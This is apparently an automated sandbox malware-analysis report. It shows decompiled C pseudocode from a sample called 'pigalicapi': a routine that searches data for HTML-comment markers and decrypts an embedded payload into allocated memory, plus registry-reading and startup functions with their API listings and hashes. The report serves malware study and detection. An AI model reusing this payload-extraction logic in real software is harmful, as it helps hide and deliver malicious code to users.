                                                                                                                                                                                                                                                                          				char _t48;
                                                                                                                                                                                                                                                                          				intOrPtr _t51;
                                                                                                                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                                                                                                                          				char _t63;
                                                                                                                                                                                                                                                                          				void* _t77;
                                                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_v20 = _a4;
                                                                                                                                                                                                                                                                          					_v13 = 0;
                                                                                                                                                                                                                                                                          					while(_v12 < _a8 - 0xa && (_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						_t48 = "<!--"; // 0x2d2d213c
                                                                                                                                                                                                                                                                          						_v32 = _t48;
                                                                                                                                                                                                                                                                          						_t63 =  *0x400c700; // 0x0
                                                                                                                                                                                                                                                                          						_v28 = _t63;
                                                                                                                                                                                                                                                                          						_t51 = E04007AF0(_v20 + _v12, _a8 - _v12,  &_v32, 4);
                                                                                                                                                                                                                                                                          						_t78 = _t77 + 0x10;
                                                                                                                                                                                                                                                                          						_v24 = _t51;
                                                                                                                                                                                                                                                                          						if(_v24 == 0) {
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v12 = _v24 - _a4;
                                                                                                                                                                                                                                                                          							_t28 = _v12 + 4; // 0x4
                                                                                                                                                                                                                                                                          							_v36 = StrStrA(_v20 + _t28, "-->");
                                                                                                                                                                                                                                                                          							if(_v36 != 0) {
                                                                                                                                                                                                                                                                          								_v44 = _v36 - _v24 - 4;
                                                                                                                                                                                                                                                                          								_t58 = E04008090(_v24 + 4, _v44, _a12, _a16); // executed
                                                                                                                                                                                                                                                                          								_t77 = _t78 + 0x10;
                                                                                                                                                                                                                                                                          								_v40 = _t58;
                                                                                                                                                                                                                                                                          								if(_v40 > 0) {
                                                                                                                                                                                                                                                                          									_v13 = 1;
                                                                                                                                                                                                                                                                          									_v8 = _v40;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v12 = _v12 + 4;
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				L16:
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                          0x04008256
                                                                                                                                                                                                                                                                          0x04008261
                                                                                                                                                                                                                                                                          0x04008285
                                                                                                                                                                                                                                                                          0x0400828f
                                                                                                                                                                                                                                                                          0x04008292
                                                                                                                                                                                                                                                                          0x04008296
                                                                                                                                                                                                                                                                          0x040082b1
                                                                                                                                                                                                                                                                          0x040082b6
                                                                                                                                                                                                                                                                          0x040082b9
                                                                                                                                                                                                                                                                          0x040082bf
                                                                                                                                                                                                                                                                          0x040082d6
                                                                                                                                                                                                                                                                          0x040082db
                                                                                                                                                                                                                                                                          0x040082de
                                                                                                                                                                                                                                                                          0x040082e5
                                                                                                                                                                                                                                                                          0x040082e7
                                                                                                                                                                                                                                                                          0x040082ed
                                                                                                                                                                                                                                                                          0x040082fb
                                                                                                                                                                                                                                                                          0x04008306
                                                                                                                                                                                                                                                                          0x0400830d
                                                                                                                                                                                                                                                                          0x04008318
                                                                                                                                                                                                                                                                          0x0400832e
                                                                                                                                                                                                                                                                          0x04008333
                                                                                                                                                                                                                                                                          0x04008336
                                                                                                                                                                                                                                                                          0x0400833d
                                                                                                                                                                                                                                                                          0x0400833f
                                                                                                                                                                                                                                                                          0x04008346
                                                                                                                                                                                                                                                                          0x04008346
                                                                                                                                                                                                                                                                          0x0400834f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400835a
                                                                                                                                                                                                                                                                          0x0400830d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040082e5
                                                                                                                                                                                                                                                                          0x04008296
                                                                                                                                                                                                                                                                          0x0400835f
                                                                                                                                                                                                                                                                          0x04008365

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000004,-->), ref: 04008300
                                                                                                                                                                                                                                                                            • Part of subcall function 04008090: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040080D8
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID: -->$<!--
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-1166897919
                                                                                                                                                                                                                                                                          • Opcode ID: 20dc3e6302552aac322e9474528943c8a2bb7ec5e025690798da4dc1e387ebc2
                                                                                                                                                                                                                                                                          • Instruction ID: 33a7bc7995a4c535701f75233fb1c46eed47e0fb0959c3fa2371b97aa1c284c8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20dc3e6302552aac322e9474528943c8a2bb7ec5e025690798da4dc1e387ebc2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23311971900249DFEF04EFA8C544BEEBBB1BB88308F14C959D505B7281E774AA84CB96
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 30%
                                                                                                                                                                                                                                                                          			E0040216C(void* __edx, char _a4) {
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				signed short _v52;
                                                                                                                                                                                                                                                                          				signed char _v56;
                                                                                                                                                                                                                                                                          				char _v100;
                                                                                                                                                                                                                                                                          				signed int _v116;
                                                                                                                                                                                                                                                                          				intOrPtr _v120;
                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v124;
                                                                                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t17;
                                                                                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                                                                                          				intOrPtr _t19;
                                                                                                                                                                                                                                                                          				intOrPtr* _t21;
                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA* _t23;
                                                                                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                                                                                                          				signed int _t32;
                                                                                                                                                                                                                                                                          				struct HINSTANCE__** _t34;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t25 = __edx;
                                                                                                                                                                                                                                                                          				_t23 =  &_a4;
                                                                                                                                                                                                                                                                          				_push( *((intOrPtr*)(_t23 - 4)));
                                                                                                                                                                                                                                                                          				_t34 = (_t32 & 0xfffffff0) - 0x6c;
                                                                                                                                                                                                                                                                          				E00402148(_t13);
                                                                                                                                                                                                                                                                          				_t21 = GetCommandLineA();
                                                                                                                                                                                                                                                                          				 *_t34 =  &_v100;
                                                                                                                                                                                                                                                                          				GetStartupInfoA(_t23);
                                                                                                                                                                                                                                                                          				_push(_t23);
                                                                                                                                                                                                                                                                          				if(_t21 != 0) {
                                                                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                                                                          						_t19 =  *_t21;
                                                                                                                                                                                                                                                                          						if(_t19 != 0x20 && _t19 != 9) {
                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t21 = _t21 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_t19 != 0x22) {
                                                                                                                                                                                                                                                                          						while(_t19 != 0) {
                                                                                                                                                                                                                                                                          							_t21 = _t21 + 1;
                                                                                                                                                                                                                                                                          							_t19 =  *_t21;
                                                                                                                                                                                                                                                                          							if(_t19 == 0x20) {
                                                                                                                                                                                                                                                                          								_t19 = 0x20;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								if(_t19 == 9) {
                                                                                                                                                                                                                                                                          									_t19 = 9;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                          							_t21 = _t21 + 1;
                                                                                                                                                                                                                                                                          							_t19 =  *_t21;
                                                                                                                                                                                                                                                                          							if(_t19 == 0x22) {
                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							if(_t19 != 0) {
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						L14:
                                                                                                                                                                                                                                                                          						_t21 = _t21 + 1;
                                                                                                                                                                                                                                                                          						_t19 =  *_t21;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                          					if(_t19 == 0x20 || _t19 == 9) {
                                                                                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if((_v56 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                          					_t27 = 0xa;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_t27 = _v52 & 0x0000ffff;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				 *_t34 = 0;
                                                                                                                                                                                                                                                                          				_t17 = GetModuleHandleA(??);
                                                                                                                                                                                                                                                                          				_push(_t25);
                                                                                                                                                                                                                                                                          				_v116 = _t27;
                                                                                                                                                                                                                                                                          				_v120 = _t21;
                                                                                                                                                                                                                                                                          				_v124 = 0;
                                                                                                                                                                                                                                                                          				 *_t34 = _t17; // executed
                                                                                                                                                                                                                                                                          				_t18 = E004015A6(); // executed
                                                                                                                                                                                                                                                                          				return _t18;
                                                                                                                                                                                                                                                                          			}




















                                                                                                                                                                                                                                                                          0x0040216c
                                                                                                                                                                                                                                                                          0x0040216c
                                                                                                                                                                                                                                                                          0x00402173
                                                                                                                                                                                                                                                                          0x0040217c
                                                                                                                                                                                                                                                                          0x0040217f
                                                                                                                                                                                                                                                                          0x00402189
                                                                                                                                                                                                                                                                          0x0040218e
                                                                                                                                                                                                                                                                          0x00402191
                                                                                                                                                                                                                                                                          0x00402196
                                                                                                                                                                                                                                                                          0x00402199
                                                                                                                                                                                                                                                                          0x0040219c
                                                                                                                                                                                                                                                                          0x0040219c
                                                                                                                                                                                                                                                                          0x004021a0
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004021a6
                                                                                                                                                                                                                                                                          0x004021a6
                                                                                                                                                                                                                                                                          0x004021ae
                                                                                                                                                                                                                                                                          0x004021bf
                                                                                                                                                                                                                                                                          0x004021b4
                                                                                                                                                                                                                                                                          0x004021b5
                                                                                                                                                                                                                                                                          0x004021b9
                                                                                                                                                                                                                                                                          0x00402224
                                                                                                                                                                                                                                                                          0x004021bb
                                                                                                                                                                                                                                                                          0x004021bd
                                                                                                                                                                                                                                                                          0x00402228
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004021bd
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004021b9
                                                                                                                                                                                                                                                                          0x004021b0
                                                                                                                                                                                                                                                                          0x004021cc
                                                                                                                                                                                                                                                                          0x004021cc
                                                                                                                                                                                                                                                                          0x004021cd
                                                                                                                                                                                                                                                                          0x004021d1
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004021ca
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004021ca
                                                                                                                                                                                                                                                                          0x004021d4
                                                                                                                                                                                                                                                                          0x004021d4
                                                                                                                                                                                                                                                                          0x004021d5
                                                                                                                                                                                                                                                                          0x004021d5
                                                                                                                                                                                                                                                                          0x004021d7
                                                                                                                                                                                                                                                                          0x004021d9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004021d9
                                                                                                                                                                                                                                                                          0x004021e3
                                                                                                                                                                                                                                                                          0x0040221c
                                                                                                                                                                                                                                                                          0x004021e5
                                                                                                                                                                                                                                                                          0x004021e5
                                                                                                                                                                                                                                                                          0x004021e5
                                                                                                                                                                                                                                                                          0x004021e9
                                                                                                                                                                                                                                                                          0x004021f0
                                                                                                                                                                                                                                                                          0x004021f5
                                                                                                                                                                                                                                                                          0x004021f6
                                                                                                                                                                                                                                                                          0x004021fa
                                                                                                                                                                                                                                                                          0x004021fe
                                                                                                                                                                                                                                                                          0x00402206
                                                                                                                                                                                                                                                                          0x00402209
                                                                                                                                                                                                                                                                          0x0040221b

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.558505777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558382730.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558681103.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558864837.0000000000406000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559037175.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559758809.0000000000420000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CommandHandleInfoLineModuleStartup
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1628297973-0
                                                                                                                                                                                                                                                                          • Opcode ID: dea9fb60a0e8c7139b7ad21b8fadcfed2fa973cf111aefb73716ac7d3e57f3bb
                                                                                                                                                                                                                                                                          • Instruction ID: a58904cd742006e8efc07750f74eda1fc12795c36ac70e21e41bb3de5e0fdb65
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dea9fb60a0e8c7139b7ad21b8fadcfed2fa973cf111aefb73716ac7d3e57f3bb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15112B3580424499DF251BA98B8D3AABBA0AB17304F94417BDEE03F2C5D2FC0883D65F
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E0400A400(char* _a4, char* _a8, char* _a12, int _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                          				long _t25;
                                                                                                                                                                                                                                                                          				long _t27;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0x80000001;
                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_v12 = 0x80000002;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                          					_t25 = RegOpenKeyExA(_v12, _a4, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                          					if(_t25 == 0) {
                                                                                                                                                                                                                                                                          						_v20 = _a16;
                                                                                                                                                                                                                                                                          						_t27 = RegQueryValueExA(_v16, _a8, 0, 0, _a12,  &_v20); // executed
                                                                                                                                                                                                                                                                          						if(_t27 == 0) {
                                                                                                                                                                                                                                                                          							_v8 = _v20;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x0400a406
                                                                                                                                                                                                                                                                          0x0400a411
                                                                                                                                                                                                                                                                          0x0400a429
                                                                                                                                                                                                                                                                          0x0400a439
                                                                                                                                                                                                                                                                          0x0400a43b
                                                                                                                                                                                                                                                                          0x0400a43b
                                                                                                                                                                                                                                                                          0x0400a442
                                                                                                                                                                                                                                                                          0x0400a45c
                                                                                                                                                                                                                                                                          0x0400a464
                                                                                                                                                                                                                                                                          0x0400a469
                                                                                                                                                                                                                                                                          0x0400a480
                                                                                                                                                                                                                                                                          0x0400a488
                                                                                                                                                                                                                                                                          0x0400a48d
                                                                                                                                                                                                                                                                          0x0400a48d
                                                                                                                                                                                                                                                                          0x0400a494
                                                                                                                                                                                                                                                                          0x0400a494
                                                                                                                                                                                                                                                                          0x0400a464
                                                                                                                                                                                                                                                                          0x0400a4a0

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0400A45C
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0400A480
                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 0400A494
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                          • Opcode ID: 26c5e8be6951219e5415309ce84e58fa5b755f2e54e0236dd9c9ae8c1af765fa
                                                                                                                                                                                                                                                                          • Instruction ID: 715db8aa4ed00a9f1925e7802d1785fb3623660146ed6b0049a8ef53f9c2d8f0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26c5e8be6951219e5415309ce84e58fa5b755f2e54e0236dd9c9ae8c1af765fa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70110D74A00309EBEB15CF94C848BEF77B8FB84744F14C558E914AB680D7B8AA51CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.558505777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558382730.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558681103.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558864837.0000000000406000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559037175.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559758809.0000000000420000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProcWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 181713994-0
                                                                                                                                                                                                                                                                          • Opcode ID: dce17d3ab1834a14d6dd11c000d5e6f7c04496a4c416f1c2b268dd238bca021c
                                                                                                                                                                                                                                                                          • Instruction ID: 1be99baf301fddce28c76e53022f88f5968e2be15515bd70b970bf4d0b2c5684
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dce17d3ab1834a14d6dd11c000d5e6f7c04496a4c416f1c2b268dd238bca021c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66010C7070A2048BEB11AE6CC18536E76A5FB04744F10483BF886E73E1D2BCD9819F9B
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008090(intOrPtr _a4, long _a8, void** _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr* _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                          				int _v48;
                                                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                                                                                          				intOrPtr _t73;
                                                                                                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v16 = _a8;
                                                                                                                                                                                                                                                                          					_t71 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t71;
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_t73 = E04001390(_v12, _a4, _v16, _v12, _v16); // executed
                                                                                                                                                                                                                                                                          						_v20 = _t73;
                                                                                                                                                                                                                                                                          						if(_v20 != 0) {
                                                                                                                                                                                                                                                                          							_v24 = _v12;
                                                                                                                                                                                                                                                                          							_v28 = _v20;
                                                                                                                                                                                                                                                                          							_v32 = E040087B0(_v20,  *_v24) & 0x0000ffff;
                                                                                                                                                                                                                                                                          							if(_v32 == 0xa) {
                                                                                                                                                                                                                                                                          								_v40 =  *((intOrPtr*)(_v24 + 4));
                                                                                                                                                                                                                                                                          								_v44 =  *((intOrPtr*)(_v24 + 8));
                                                                                                                                                                                                                                                                          								_v36 = E040016F0(_v24 + 0xc, _v28 - 0xc);
                                                                                                                                                                                                                                                                          								if(_v36 == _v44) {
                                                                                                                                                                                                                                                                          									E04008630(_v24 + 0xc, 4, _v40);
                                                                                                                                                                                                                                                                          									_v48 =  *((intOrPtr*)(_v24 + 0xc));
                                                                                                                                                                                                                                                                          									E04008630(_v24 + 0x10, _v48, _v40);
                                                                                                                                                                                                                                                                          									_v52 = _v28 - _v48 + 0x10;
                                                                                                                                                                                                                                                                          									_t52 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                          									_t91 = E04008A70(_v24 + _t52,  &_v52, _v24 + 0x10, _v48, 0x4013410, 0x254); // executed
                                                                                                                                                                                                                                                                          									if(_t91 != 0) {
                                                                                                                                                                                                                                                                          										_t93 = VirtualAlloc(0, _v52, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          										 *_a12 = _t93;
                                                                                                                                                                                                                                                                          										if( *_a12 != 0) {
                                                                                                                                                                                                                                                                          											_t60 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                          											E04007B70( *_a12, _v24 + _t60, _v52);
                                                                                                                                                                                                                                                                          											 *_a16 = _v52;
                                                                                                                                                                                                                                                                          											_v8 = _v52;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_v8 == 0) {
                                                                                                                                                                                                                                                                          							VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                          0x04008096
                                                                                                                                                                                                                                                                          0x040080a1
                                                                                                                                                                                                                                                                          0x04008246
                                                                                                                                                                                                                                                                          0x0400824c
                                                                                                                                                                                                                                                                          0x040080c5
                                                                                                                                                                                                                                                                          0x040080c8
                                                                                                                                                                                                                                                                          0x040080d8
                                                                                                                                                                                                                                                                          0x040080de
                                                                                                                                                                                                                                                                          0x040080e5
                                                                                                                                                                                                                                                                          0x040080fb
                                                                                                                                                                                                                                                                          0x04008103
                                                                                                                                                                                                                                                                          0x0400810a
                                                                                                                                                                                                                                                                          0x04008113
                                                                                                                                                                                                                                                                          0x04008119
                                                                                                                                                                                                                                                                          0x0400812d
                                                                                                                                                                                                                                                                          0x04008134
                                                                                                                                                                                                                                                                          0x04008140
                                                                                                                                                                                                                                                                          0x04008149
                                                                                                                                                                                                                                                                          0x04008162
                                                                                                                                                                                                                                                                          0x0400816b
                                                                                                                                                                                                                                                                          0x0400817e
                                                                                                                                                                                                                                                                          0x0400818c
                                                                                                                                                                                                                                                                          0x0400819e
                                                                                                                                                                                                                                                                          0x040081b1
                                                                                                                                                                                                                                                                          0x040081d3
                                                                                                                                                                                                                                                                          0x040081d8
                                                                                                                                                                                                                                                                          0x040081e2
                                                                                                                                                                                                                                                                          0x040081f1
                                                                                                                                                                                                                                                                          0x040081fa
                                                                                                                                                                                                                                                                          0x04008202
                                                                                                                                                                                                                                                                          0x0400820e
                                                                                                                                                                                                                                                                          0x04008219
                                                                                                                                                                                                                                                                          0x04008227
                                                                                                                                                                                                                                                                          0x0400822c
                                                                                                                                                                                                                                                                          0x0400822c
                                                                                                                                                                                                                                                                          0x04008202
                                                                                                                                                                                                                                                                          0x040081e2
                                                                                                                                                                                                                                                                          0x0400816b
                                                                                                                                                                                                                                                                          0x04008134
                                                                                                                                                                                                                                                                          0x04008233
                                                                                                                                                                                                                                                                          0x04008240
                                                                                                                                                                                                                                                                          0x04008240
                                                                                                                                                                                                                                                                          0x04008233
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040080e5

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040080D8
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04008240
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
